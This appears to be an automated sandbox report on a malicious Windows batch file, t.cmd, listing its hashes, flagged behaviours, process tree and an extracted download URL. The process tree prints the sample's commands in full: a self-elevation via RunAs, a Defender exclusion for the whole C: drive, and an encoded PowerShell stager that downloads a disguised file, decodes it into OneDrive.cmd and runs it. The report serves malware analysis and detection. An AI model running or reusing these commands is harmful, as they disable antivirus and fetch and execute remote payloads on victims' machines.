Analysis
-
max time kernel
16s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
02-01-2025 09:14
Static task
static1
Behavioral task
behavioral1
Sample
t.cmd
Resource
win7-20240729-en
General
-
Target
t.cmd
-
Size
1KB
-
MD5
c3a80dbc5b98aac01cc124b59ec52d7e
-
SHA1
eae4d2a89be841042839e8bfeca7480a2ba327e4
-
SHA256
4d5a2a643cdab50f0105e110a8187cd812a7ebbc7d903b8a8029cd3508094f32
-
SHA512
addf559ed04d9cbaccdc25d87940c0c0af41e183087c9c956bab438b7cf755a7481aa88d534792c265ace9491302ae81343de77d4c93101a232d44d47500d5a9
Malware Config
Extracted
https://i.imghippo.com/files/Zf9637kKg.jpg
Signatures
-
pid Process 2740 powershell.exe 1616 powershell.exe 2752 powershell.exe 2528 powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2752 powershell.exe 2740 powershell.exe 2740 powershell.exe 2740 powershell.exe 2528 powershell.exe 2980 powershell.exe 1616 powershell.exe 2864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2752 powershell.exe Token: SeDebugPrivilege 2740 powershell.exe Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 2980 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2764 wrote to memory of 2752 2764 cmd.exe 32 PID 2764 wrote to memory of 2752 2764 cmd.exe 32 PID 2764 wrote to memory of 2752 2764 cmd.exe 32 PID 2764 wrote to memory of 2740 2764 cmd.exe 33 PID 2764 wrote to memory of 2740 2764 cmd.exe 33 PID 2764 wrote to memory of 2740 2764 cmd.exe 33 PID 2740 wrote to memory of 2660 2740 powershell.exe 34 PID 2740 wrote to memory of 2660 2740 powershell.exe 34 PID 2740 wrote to memory of 2660 2740 powershell.exe 34 PID 2660 wrote to memory of 2528 2660 cmd.exe 36 PID 2660 wrote to memory of 2528 2660 cmd.exe 36 PID 2660 wrote to memory of 2528 2660 cmd.exe 36 PID 2660 wrote to memory of 2980 2660 cmd.exe 37 PID 2660 wrote to memory of 2980 2660 cmd.exe 37 PID 2660 wrote to memory of 2980 2660 cmd.exe 37 PID 2980 wrote to memory of 1616 2980 powershell.exe 38 PID 2980 wrote to memory of 1616 2980 powershell.exe 38 PID 2980 wrote to memory of 1616 2980 powershell.exe 38 PID 2660 wrote to memory of 2864 2660 cmd.exe 39 PID 2660 wrote to memory of 2864 2660 cmd.exe 39 PID 2660 wrote to memory of 2864 2660 cmd.exe 39
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\t.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\t.cmd' -ArgumentList 'am_admin'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\t.cmd" am_admin3⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -command ""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGkALgBpAG0AZwBoAGkAcABwAG8ALgBjAG8AbQAvAGYAaQBsAGUAcwAvAFoAZgA5ADYAMwA3AGsASwBnAC4AagBwAGcAIgA7ACQAcABhAHQAaAA9ACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABPAG4AZQBEAHIAaQB2AGUAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AGkAdwByACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABwAGEAdABoAFwAYgB1AGQAZAB5AC4AagBwAGcAIgA7AFsASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAVABlAHgAdAAoACIAJABwAGEAdABoAFwATwBuAGUARAByAGkAdgBlAC4AYwBtAGQAIgAsAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAZwBjACAAIgAkAHAAYQB0AGgAXABiAHUAZABkAHkALgBqAHAAZwAiACAALQBSAGEAdwApACkAKQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAJABwAGEAdABoAFwATwBuAGUARAByAGkAdgBlAC4AYwBtAGQAIgA=4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56d8ccabe8e6626f2e16aa35916731b51
SHA1c33d25a35fb88cffcd4e11ed7c90b060785c559c
SHA256de3a5cc466646cbff5f084fe20d5e8addd0cff4925f0b391dc57594a3a9ec8e7
SHA512c4da3e84b7fc8051167c47a063ae9cf1741cf887d7e9a975cd9ca7b1365625478ef12c43580bff2aeb809a7d26d4b916c280a8d73d6ebfcf95b1c2cb1503823e